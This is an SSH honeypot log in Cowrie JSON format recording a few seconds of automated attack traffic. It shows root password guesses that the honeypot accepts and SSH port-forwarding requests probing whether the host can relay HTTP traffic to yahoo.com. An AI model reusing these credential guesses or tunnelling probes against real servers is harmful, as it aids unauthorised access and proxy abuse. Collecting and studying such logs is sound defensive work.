{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":16038,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:16038","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.617423Z","session":"facad029947a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.628948Z","src_ip":"27.112.78.170","session":"e333a354da6e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.664554Z","src_ip":"213.209.150.239","session":"facad029947a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.712280Z","src_ip":"213.209.150.239","session":"facad029947a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57010,"dst_ip":"1.2.3.4","dst_port":22,"session":"97d09d2bd1d1","protocol":"ssh","message":"New connection: 213.209.150.239:57010 (1.2.3.4:22) [session: 97d09d2bd1d1]","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.768051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.768989Z","src_ip":"213.209.150.239","session":"97d09d2bd1d1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.825514Z","src_ip":"213.209.150.239","session":"97d09d2bd1d1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:40.108423Z","src_ip":"213.209.150.239","session":"97d09d2bd1d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":22939,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:22939","sensor":"my-vps","timestamp":"2025-08-26T00:56:40.165858Z","session":"97d09d2bd1d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:40.223038Z","src_ip":"213.209.150.239","session":"97d09d2bd1d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":3497,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3497","sensor":"my-vps","timestamp":"2025-08-26T00:56:40.379095Z","session":"97d09d2bd1d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:40.435760Z","src_ip":"213.209.150.239","session":"97d09d2bd1d1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:40.493474Z","src_ip":"213.209.150.239","session":"97d09d2bd1d1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57070,"dst_ip":"1.2.3.4","dst_port":22,"session":"8efb742f1a82","protocol":"ssh","message":"New connection: 213.209.150.239:57070 (1.2.3.4:22) [session: 8efb742f1a82]","sensor":"my-vps","timestamp":"2025-08-26T00:56:40.539804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:40.540960Z","src_ip":"213.209.150.239","session":"8efb742f1a82"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:40.588177Z","src_ip":"213.209.150.239","session":"8efb742f1a82"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:40.743136Z","src_ip":"27.112.78.170","session":"e333a354da6e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:40.823208Z","src_ip":"213.209.150.239","session":"8efb742f1a82"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":6085,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:6085","sensor":"my-vps","timestamp":"2025-08-26T00:56:40.871362Z","session":"8efb742f1a82"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:40.918688Z","src_ip":"213.209.150.239","session":"8efb742f1a82"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.011507Z","src_ip":"27.112.78.170","session":"e333a354da6e"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.012934Z","src_ip":"27.112.78.170","session":"7956d706bd5e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":486,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:486","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.053585Z","session":"8efb742f1a82"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.100866Z","src_ip":"213.209.150.239","session":"8efb742f1a82"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.148832Z","src_ip":"213.209.150.239","session":"8efb742f1a82"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57114,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed8a85d47e37","protocol":"ssh","message":"New connection: 213.209.150.239:57114 (1.2.3.4:22) [session: ed8a85d47e37]","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.204087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.204806Z","src_ip":"213.209.150.239","session":"ed8a85d47e37"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.261188Z","src_ip":"213.209.150.239","session":"ed8a85d47e37"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.542922Z","src_ip":"213.209.150.239","session":"ed8a85d47e37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":21916,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:21916","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.600515Z","session":"ed8a85d47e37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.657063Z","src_ip":"213.209.150.239","session":"ed8a85d47e37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14493,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14493","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.810845Z","session":"ed8a85d47e37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.867231Z","src_ip":"213.209.150.239","session":"ed8a85d47e37"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.924248Z","src_ip":"213.209.150.239","session":"ed8a85d47e37"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57171,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b01f126f388","protocol":"ssh","message":"New connection: 213.209.150.239:57171 (1.2.3.4:22) [session: 1b01f126f388]","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.979982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:41.980651Z","src_ip":"213.209.150.239","session":"1b01f126f388"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:42.037629Z","src_ip":"213.209.150.239","session":"1b01f126f388"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:42.319897Z","src_ip":"213.209.150.239","session":"1b01f126f388"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":27255,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:27255","sensor":"my-vps","timestamp":"2025-08-26T00:56:42.377491Z","session":"1b01f126f388"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:42.434216Z","src_ip":"213.209.150.239","session":"1b01f126f388"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":5380,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:5380","sensor":"my-vps","timestamp":"2025-08-26T00:56:42.590981Z","session":"1b01f126f388"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:42.647583Z","src_ip":"213.209.150.239","session":"1b01f126f388"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:42.705316Z","src_ip":"213.209.150.239","session":"1b01f126f388"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57229,"dst_ip":"1.2.3.4","dst_port":22,"session":"2063644ec707","protocol":"ssh","message":"New connection: 213.209.150.239:57229 (1.2.3.4:22) [session: 2063644ec707]","sensor":"my-vps","timestamp":"2025-08-26T00:56:42.751478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:42.752229Z","src_ip":"213.209.150.239","session":"2063644ec707"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:42.799491Z","src_ip":"213.209.150.239","session":"2063644ec707"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:43.034140Z","src_ip":"213.209.150.239","session":"2063644ec707"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":11607,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:11607","sensor":"my-vps","timestamp":"2025-08-26T00:56:43.082584Z","session":"2063644ec707"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:43.129983Z","src_ip":"213.209.150.239","session":"2063644ec707"}
